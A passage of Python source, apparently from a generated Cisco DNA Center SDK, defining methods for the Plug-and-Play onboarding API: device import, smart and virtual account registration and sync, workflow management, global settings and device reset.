if 'Content-Type' in headers:
check_type(headers.get('Content-Type'),
basestring, may_be_none=False)
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_21a6db2540298f55_v1_3_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-device/import')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=params,
json=_payload)
return self._object_factory('bpm_21a6db2540298f55_v1_3_3', json_data)
def add_virtual_account(self,
autoSyncPeriod=None,
ccoUser=None,
expiry=None,
lastSync=None,
profile=None,
smartAccountId=None,
syncResult=None,
syncResultStr=None,
syncStartTime=None,
syncStatus=None,
tenantId=None,
token=None,
virtualAccountId=None,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Registers a Smart Account, Virtual Account and the relevant
server profile info with the PnP System & database. The
devices present in the registered virtual account are
synced with the PnP database as well. The response
payload returns the new profile.
Args:
autoSyncPeriod(number): SAVAMapping's autoSyncPeriod.
ccoUser(string): SAVAMapping's ccoUser.
expiry(number): SAVAMapping's expiry.
lastSync(number): SAVAMapping's lastSync.
profile(object): SAVAMapping's profile.
smartAccountId(string): SAVAMapping's smartAccountId.
syncResult(object): SAVAMapping's syncResult.
syncResultStr(string): SAVAMapping's syncResultStr.
syncStartTime(number): SAVAMapping's syncStartTime.
syncStatus(string): SAVAMapping's syncStatus. Available
values are 'NOT_SYNCED', 'SYNCING',
'SUCCESS' and 'FAILURE'.
tenantId(string): SAVAMapping's tenantId.
token(string): SAVAMapping's token.
virtualAccountId(string): SAVAMapping's
virtualAccountId.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(dict): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, dict)
if headers is not None:
if 'Content-Type' in headers:
check_type(headers.get('Content-Type'),
basestring, may_be_none=False)
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
_payload = {
'autoSyncPeriod':
autoSyncPeriod,
'ccoUser':
ccoUser,
'expiry':
expiry,
'lastSync':
lastSync,
'profile':
profile,
'smartAccountId':
smartAccountId,
'syncResult':
syncResult,
'syncResultStr':
syncResultStr,
'syncStartTime':
syncStartTime,
'syncStatus':
syncStatus,
'tenantId':
tenantId,
'token':
token,
'virtualAccountId':
virtualAccountId,
}
_payload.update(payload or {})
_payload = dict_from_items_with_values(_payload)
if active_validation:
self._request_validator('jsd_1e962af345b8b59f_v1_3_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-settings/savacct')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=params,
json=_payload)
return self._object_factory('bpm_1e962af345b8b59f_v1_3_3', json_data)
def update_workflow(self,
id,
_id=None,
addToInventory=None,
addedOn=None,
configId=None,
currTaskIdx=None,
description=None,
endTime=None,
execTime=None,
imageId=None,
instanceType=None,
lastupdateOn=None,
name=None,
startTime=None,
state=None,
tasks=None,
tenantId=None,
type=None,
useState=None,
version=None,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Updates an existing workflow.
Args:
_id(string): Workflow's _id.
addToInventory(boolean): Workflow's addToInventory.
addedOn(number): Workflow's addedOn.
configId(string): Workflow's configId.
currTaskIdx(number): Workflow's currTaskIdx.
description(string): Workflow's description.
endTime(number): Workflow's endTime.
execTime(number): Workflow's execTime.
imageId(string): Workflow's imageId.
instanceType(string): Workflow's instanceType. Available
values are 'SystemWorkflow',
'UserWorkflow' and
'SystemResetWorkflow'.
lastupdateOn(number): Workflow's lastupdateOn.
name(string): Workflow's name.
startTime(number): Workflow's startTime.
state(string): Workflow's state.
tasks(list): Workflow's tasks (list of objects).
tenantId(string): Workflow's tenantId.
type(string): Workflow's type.
useState(string): Workflow's useState.
version(number): Workflow's version.
id(basestring): id path parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(dict): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, dict)
check_type(id, basestring,
may_be_none=False)
if headers is not None:
if 'Content-Type' in headers:
check_type(headers.get('Content-Type'),
basestring, may_be_none=False)
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
'id': id,
}
_payload = {
'_id':
_id,
'addToInventory':
addToInventory,
'addedOn':
addedOn,
'configId':
configId,
'currTaskIdx':
currTaskIdx,
'description':
description,
'endTime':
endTime,
'execTime':
execTime,
'imageId':
imageId,
'instanceType':
instanceType,
'lastupdateOn':
lastupdateOn,
'name':
name,
'startTime':
startTime,
'state':
state,
'tasks':
tasks,
'tenantId':
tenantId,
'type':
type,
'useState':
useState,
'version':
version,
}
_payload.update(payload or {})
_payload = dict_from_items_with_values(_payload)
if active_validation:
self._request_validator('jsd_3086c9624f498b85_v1_3_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-workflow/${id}')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.put(endpoint_full_url, params=params,
json=_payload,
headers=_headers)
else:
json_data = self._session.put(endpoint_full_url, params=params,
json=_payload)
return self._object_factory('bpm_3086c9624f498b85_v1_3_3', json_data)
def deregister_virtual_account(self,
domain,
name,
headers=None,
**request_parameters):
"""Deregisters the specified smart account & virtual account info
and the associated device information from the PnP
System & database. The devices associated with the
deregistered virtual account are removed from the PnP
database as well. The response payload contains the
deregistered smart & virtual account information.
Args:
domain(basestring): Smart Account Domain.
name(basestring): Virtual Account Name.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(domain, basestring,
may_be_none=False)
check_type(name, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
'domain':
domain,
'name':
name,
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-settings/vacct')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=params)
return self._object_factory('bpm_2499e9ad42e8ae5b_v1_3_3', json_data)
def get_smart_account_list(self,
headers=None,
**request_parameters):
"""Returns the list of Smart Account domains.
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
list: JSON response. A list of MyDict objects.
Access the object's properties by using the dot notation
or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-settings/sacct')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=params)
return self._object_factory('bpm_3cb24acb486b89d2_v1_3_3', json_data)
def claim_a_device_to_a_site(self,
deviceId=None,
siteId=None,
type=None,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Claim a device based on DNA-C Site based design process.
Different parameters are required for different device
platforms.
Args:
deviceId(string): SiteProvisionRequest's deviceId.
siteId(string): SiteProvisionRequest's siteId.
type(string): SiteProvisionRequest's type. Available
values are 'Default', 'AccessPoint',
'StackSwitch', 'Sensor' and
'MobilityExpress'.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(dict): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, dict)
if headers is not None:
if 'Content-Type' in headers:
check_type(headers.get('Content-Type'),
basestring, may_be_none=False)
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
_payload = {
'deviceId':
deviceId,
'siteId':
siteId,
'type':
type,
}
_payload.update(payload or {})
_payload = dict_from_items_with_values(_payload)
if active_validation:
self._request_validator('jsd_5889fb844939a13b_v1_3_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-device/site-claim')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=params,
json=_payload)
return self._object_factory('bpm_5889fb844939a13b_v1_3_3', json_data)
def update_pnp_server_profile(self,
autoSyncPeriod=None,
ccoUser=None,
expiry=None,
lastSync=None,
profile=None,
smartAccountId=None,
syncResult=None,
syncResultStr=None,
syncStartTime=None,
syncStatus=None,
tenantId=None,
token=None,
virtualAccountId=None,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Updates the PnP Server profile in a registered Virtual Account
in the PnP database. The response payload returns the
updated smart & virtual account info.
Args:
autoSyncPeriod(number): SAVAMapping's autoSyncPeriod.
ccoUser(string): SAVAMapping's ccoUser.
expiry(number): SAVAMapping's expiry.
lastSync(number): SAVAMapping's lastSync.
profile(object): SAVAMapping's profile.
smartAccountId(string): SAVAMapping's smartAccountId.
syncResult(object): SAVAMapping's syncResult.
syncResultStr(string): SAVAMapping's syncResultStr.
syncStartTime(number): SAVAMapping's syncStartTime.
syncStatus(string): SAVAMapping's syncStatus. Available
values are 'NOT_SYNCED', 'SYNCING',
'SUCCESS' and 'FAILURE'.
tenantId(string): SAVAMapping's tenantId.
token(string): SAVAMapping's token.
virtualAccountId(string): SAVAMapping's
virtualAccountId.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(dict): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, dict)
if headers is not None:
if 'Content-Type' in headers:
check_type(headers.get('Content-Type'),
basestring, may_be_none=False)
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
_payload = {
'autoSyncPeriod':
autoSyncPeriod,
'ccoUser':
ccoUser,
'expiry':
expiry,
'lastSync':
lastSync,
'profile':
profile,
'smartAccountId':
smartAccountId,
'syncResult':
syncResult,
'syncResultStr':
syncResultStr,
'syncStartTime':
syncStartTime,
'syncStatus':
syncStatus,
'tenantId':
tenantId,
'token':
token,
'virtualAccountId':
virtualAccountId,
}
_payload.update(payload or {})
_payload = dict_from_items_with_values(_payload)
if active_validation:
self._request_validator('jsd_6f9819e84178870c_v1_3_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-settings/savacct')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.put(endpoint_full_url, params=params,
json=_payload,
headers=_headers)
else:
json_data = self._session.put(endpoint_full_url, params=params,
json=_payload)
return self._object_factory('bpm_6f9819e84178870c_v1_3_3', json_data)
def get_pnp_global_settings(self,
headers=None,
**request_parameters):
"""Returns global PnP settings of the user.
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-settings')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=params)
return self._object_factory('bpm_7e92f9eb46db8320_v1_3_3', json_data)
def get_workflow_count(self,
name=None,
headers=None,
**request_parameters):
"""Returns the workflow count.
Args:
name(basestring): Workflow Name.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(name, basestring)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
'name':
name,
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-workflow/count')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=params)
return self._object_factory('bpm_7989f86846faaf99_v1_3_3', json_data)
def get_virtual_account_list(self,
domain,
headers=None,
**request_parameters):
"""Returns list of virtual accounts associated with the specified
smart account.
Args:
domain(basestring): Smart Account Domain.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
list: JSON response. A list of MyDict objects.
Access the object's properties by using the dot notation
or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(domain, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
'domain': domain,
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-'
+ 'settings/sacct/${domain}/vacct')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=params)
return self._object_factory('bpm_70a479a6462a9496_v1_3_3', json_data)
def get_workflow_by_id(self,
id,
headers=None,
**request_parameters):
"""Returns a workflow specified by id.
Args:
id(basestring): id path parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(id, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
'id': id,
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-workflow/${id}')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=params)
return self._object_factory('bpm_80acb88e4ac9ac6d_v1_3_3', json_data)
def add_a_workflow(self,
_id=None,
addToInventory=None,
addedOn=None,
configId=None,
currTaskIdx=None,
description=None,
endTime=None,
execTime=None,
imageId=None,
instanceType=None,
lastupdateOn=None,
name=None,
startTime=None,
state=None,
tasks=None,
tenantId=None,
type=None,
useState=None,
version=None,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Adds a PnP Workflow along with the relevant tasks in the
workflow into the PnP database.
Args:
_id(string): Workflow's _id.
addToInventory(boolean): Workflow's addToInventory.
addedOn(number): Workflow's addedOn.
configId(string): Workflow's configId.
currTaskIdx(number): Workflow's currTaskIdx.
description(string): Workflow's description.
endTime(number): Workflow's endTime.
execTime(number): Workflow's execTime.
imageId(string): Workflow's imageId.
instanceType(string): Workflow's instanceType. Available
values are 'SystemWorkflow',
'UserWorkflow' and
'SystemResetWorkflow'.
lastupdateOn(number): Workflow's lastupdateOn.
name(string): Workflow's name.
startTime(number): Workflow's startTime.
state(string): Workflow's state.
tasks(list): Workflow's tasks (list of objects).
tenantId(string): Workflow's tenantId.
type(string): Workflow's type.
useState(string): Workflow's useState.
version(number): Workflow's version.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(dict): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, dict)
if headers is not None:
if 'Content-Type' in headers:
check_type(headers.get('Content-Type'),
basestring, may_be_none=False)
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
_payload = {
'_id':
_id,
'addToInventory':
addToInventory,
'addedOn':
addedOn,
'configId':
configId,
'currTaskIdx':
currTaskIdx,
'description':
description,
'endTime':
endTime,
'execTime':
execTime,
'imageId':
imageId,
'instanceType':
instanceType,
'lastupdateOn':
lastupdateOn,
'name':
name,
'startTime':
startTime,
'state':
state,
'tasks':
tasks,
'tenantId':
tenantId,
'type':
type,
'useState':
useState,
'version':
version,
}
_payload.update(payload or {})
_payload = dict_from_items_with_values(_payload)
if active_validation:
self._request_validator('jsd_848b5a7b4f9b8c12_v1_3_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-workflow')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=params,
json=_payload)
return self._object_factory('bpm_848b5a7b4f9b8c12_v1_3_3', json_data)
def update_pnp_global_settings(self,
_id=None,
aaaCredentials=None,
acceptEula=None,
defaultProfile=None,
savaMappingList=None,
taskTimeOuts=None,
tenantId=None,
version=None,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Updates the user's list of global PnP settings.
Args:
_id(string): Settings's _id.
aaaCredentials(object): Settings's aaaCredentials.
acceptEula(boolean): Settings's acceptEula.
defaultProfile(object): Settings's defaultProfile.
savaMappingList(list): Settings's savaMappingList (list
of objects).
taskTimeOuts(object): Settings's taskTimeOuts.
tenantId(string): Settings's tenantId.
version(number): Settings's version.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(dict): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, dict)
if headers is not None:
if 'Content-Type' in headers:
check_type(headers.get('Content-Type'),
basestring, may_be_none=False)
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
_payload = {
'_id':
_id,
'aaaCredentials':
aaaCredentials,
'acceptEula':
acceptEula,
'defaultProfile':
defaultProfile,
'savaMappingList':
savaMappingList,
'taskTimeOuts':
taskTimeOuts,
'tenantId':
tenantId,
'version':
version,
}
_payload.update(payload or {})
_payload = dict_from_items_with_values(_payload)
if active_validation:
self._request_validator('jsd_8da0391947088a5a_v1_3_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-settings')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.put(endpoint_full_url, params=params,
json=_payload,
headers=_headers)
else:
json_data = self._session.put(endpoint_full_url, params=params,
json=_payload)
return self._object_factory('bpm_8da0391947088a5a_v1_3_3', json_data)
def reset_device(self,
deviceResetList=None,
projectId=None,
workflowId=None,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Recovers a device from a Workflow Execution Error state.
Args:
deviceResetList(list): ResetRequest's deviceResetList
(list of objects).
projectId(string): ResetRequest's projectId.
workflowId(string): ResetRequest's workflowId.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(dict): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, dict)
if headers is not None:
if 'Content-Type' in headers:
check_type(headers.get('Content-Type'),
basestring, may_be_none=False)
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
_payload = {
'deviceResetList':
deviceResetList,
'projectId':
projectId,
'workflowId':
workflowId,
}
_payload.update(payload or {})
_payload = dict_from_items_with_values(_payload)
if active_validation:
self._request_validator('jsd_9e857b5a4a0bbcdb_v1_3_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-device/reset')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=params,
json=_payload)
return self._object_factory('bpm_9e857b5a4a0bbcdb_v1_3_3', json_data)
def sync_virtual_account_devices(self,
autoSyncPeriod=None,
ccoUser=None,
expiry=None,
lastSync=None,
profile=None,
smartAccountId=None,
syncResult=None,
syncResultStr=None,
syncStartTime=None,
syncStatus=None,
tenantId=None,
token=None,
virtualAccountId=None,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Synchronizes the device info from the given smart account &
virtual account with the PnP database. The response
payload returns a list of synced devices.
Args:
autoSyncPeriod(number): SAVAMapping's autoSyncPeriod.
ccoUser(string): SAVAMapping's ccoUser.
expiry(number): SAVAMapping's expiry.
lastSync(number): SAVAMapping's lastSync.
profile(object): SAVAMapping's profile.
smartAccountId(string): SAVAMapping's smartAccountId.
syncResult(object): SAVAMapping's syncResult.
syncResultStr(string): SAVAMapping's syncResultStr.
syncStartTime(number): SAVAMapping's syncStartTime.
syncStatus(string): SAVAMapping's syncStatus. Available
values are 'NOT_SYNCED', 'SYNCING',
'SUCCESS' and 'FAILURE'.
tenantId(string): SAVAMapping's tenantId.
token(string): SAVAMapping's token.
virtualAccountId(string): SAVAMapping's
virtualAccountId.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(dict): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, dict)
if headers is not None:
if 'Content-Type' in headers:
check_type(headers.get('Content-Type'),
basestring, may_be_none=False)
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
_payload = {
'autoSyncPeriod':
autoSyncPeriod,
'ccoUser':
ccoUser,
'expiry':
expiry,
'lastSync':
lastSync,
'profile':
profile,
'smartAccountId':
smartAccountId,
'syncResult':
syncResult,
'syncResultStr':
syncResultStr,
'syncStartTime':
syncStartTime,
'syncStatus':
syncStatus,
'tenantId':
tenantId,
'token':
token,
'virtualAccountId':
virtualAccountId,
}
_payload.update(payload or {})
_payload = dict_from_items_with_values(_payload)
if active_validation:
self._request_validator('jsd_a4b6c87a4ffb9efa_v1_3_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-device/vacct-sync')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=params,
json=_payload)
return self._object_factory('bpm_a4b6c87a4ffb9efa_v1_3_3', json_data)
def delete_workflow_by_id(self,
id,
headers=None,
**request_parameters):
"""Deletes a workflow specified by id.
Args:
id(basestring): id path parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(id, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
'id': id,
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-workflow/${id}')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=params)
return self._object_factory('bpm_af8d7b0e470b8ae2_v1_3_3', json_data)
def get_workflows(self,
limit=None,
name=None,
offset=None,
sort=None,
sort_order=None,
type=None,
headers=None,
**request_parameters):
